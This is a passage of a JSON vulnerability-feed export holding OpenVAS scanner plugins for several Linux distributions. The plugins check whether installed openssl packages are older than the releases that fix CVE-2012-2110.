"http://plugins.openvas.org/nasl.php?oid=831568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openssl MDVSA-2012:060 (openssl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A potentially exploitable vulnerability has been discovered in\n the OpenSSL function asn1_d2i_read_bio that affects S/MIME or CMS\n applications using the built in MIME parser SMIME_read_PKCS7 or\n SMIME_read_CMS (CVE-2012-2110).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"openssl on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:060\");\n script_id(831568);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:49:38 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:060\");\n script_name(\"Mandriva Update for openssl MDVSA-2012:060 (openssl)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0\", rpm:\"libopenssl1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-engines1.0.0\", rpm:\"libopenssl-engines1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-static-devel\", rpm:\"libopenssl-static-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0\", rpm:\"lib64openssl1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-devel\", rpm:\"lib64openssl-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-engines1.0.0\", rpm:\"lib64openssl-engines1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-static-devel\", rpm:\"lib64openssl-static-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8-devel\", rpm:\"libopenssl0.9.8-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8-static-devel\", rpm:\"libopenssl0.9.8-static-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-devel\", rpm:\"lib64openssl0.9.8-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-static-devel\", rpm:\"lib64openssl0.9.8-static-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8v~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0\", rpm:\"libopenssl1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0-devel\", rpm:\"libopenssl1.0.0-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0-static-devel\", rpm:\"libopenssl1.0.0-static-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-engines1.0.0\", rpm:\"libopenssl-engines1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8v~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0\", rpm:\"lib64openssl1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0-devel\", rpm:\"lib64openssl1.0.0-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0-static-devel\", rpm:\"lib64openssl1.0.0-static-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-engines1.0.0\", rpm:\"lib64openssl-engines1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:56:31", "description": "Check for the Version of openssl097a", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for openssl097a CESA-2012:0518 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:881108", "href": "http://plugins.openvas.org/nasl.php?oid=881108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl097a CESA-2012:0518 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n Multiple numeric conversion errors, leading to a buffer overflow, were\n found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\n from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n (Distinguished Encoding Rules) encoded data read from a file or other BIO\n input could cause an application using the OpenSSL library to crash or,\n potentially, execute arbitrary code. (CVE-2012-2110)\n \n All OpenSSL users should upgrade to these updated packages, which contain\n a backported patch to resolve this issue. For the update to take effect,\n all services linked to the OpenSSL library must be restarted, or the system\n rebooted.\";\n\ntag_affected = \"openssl097a on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018592.html\");\n script_id(881108);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:09:21 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2012:0518\");\n script_name(\"CentOS Update for openssl097a CESA-2012:0518 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl097a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~11.el5_8.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~22.el5_8.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~0.9.8e~22.el5_8.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~0.9.8e~22.el5_8.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for openssl098e CESA-2012:0518 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl098e CESA-2012:0518 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018596.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881190\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:39:47 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2012:0518\");\n script_name(\"CentOS Update for openssl098e CESA-2012:0518 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl098e'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"openssl098e on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\n and Transport Layer Security (TLS v1) protocols, as well as a\n full-strength, general purpose cryptography library.\n\n Multiple numeric conversion errors, leading to a buffer overflow, were\n found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\n from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER\n (Distinguished Encoding Rules) encoded data read from a file or other BIO\n input could cause an application using the OpenSSL library to crash or,\n potentially, execute arbitrary code. (CVE-2012-2110)\n\n All OpenSSL users should upgrade to these updated packages, which contain\n a backported patch to resolve this issue. For the update to take effect,\n all services linked to the OpenSSL library must be restarted, or the system\n rebooted.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl098e\", rpm:\"openssl098e~0.9.8e~17.el6.centos.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.0~20.el6_2.4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for openssl MDVSA-2012:060 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831568", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831568", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openssl MDVSA-2012:060 (openssl)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:060\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831568\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:49:38 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:060\");\n script_name(\"Mandriva Update for openssl MDVSA-2012:060 (openssl)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2|2010\\.1)\");\n script_tag(name:\"affected\", value:\"openssl on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A potentially exploitable vulnerability has been discovered in\n the OpenSSL function asn1_d2i_read_bio that affects S/MIME or CMS\n applications using the built in MIME parser SMIME_read_PKCS7 or\n SMIME_read_CMS (CVE-2012-2110).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0\", rpm:\"libopenssl1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-engines1.0.0\", rpm:\"libopenssl-engines1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-static-devel\", rpm:\"libopenssl-static-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0\", rpm:\"lib64openssl1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-devel\", rpm:\"lib64openssl-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-engines1.0.0\", rpm:\"lib64openssl-engines1.0.0~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-static-devel\", rpm:\"lib64openssl-static-devel~1.0.0d~2.5\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8-devel\", rpm:\"libopenssl0.9.8-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8-static-devel\", rpm:\"libopenssl0.9.8-static-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-devel\", rpm:\"lib64openssl0.9.8-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8-static-devel\", rpm:\"lib64openssl0.9.8-static-devel~0.9.8h~3.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8v~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0\", rpm:\"libopenssl1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0-devel\", rpm:\"libopenssl1.0.0-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1.0.0-static-devel\", rpm:\"libopenssl1.0.0-static-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-engines1.0.0\", rpm:\"libopenssl-engines1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8v~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0\", rpm:\"lib64openssl1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0-devel\", rpm:\"lib64openssl1.0.0-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl1.0.0-static-devel\", rpm:\"lib64openssl1.0.0-static-devel~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl-engines1.0.0\", rpm:\"lib64openssl-engines1.0.0~1.0.0a~1.12mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:03:43", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-72)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120152", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120152", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 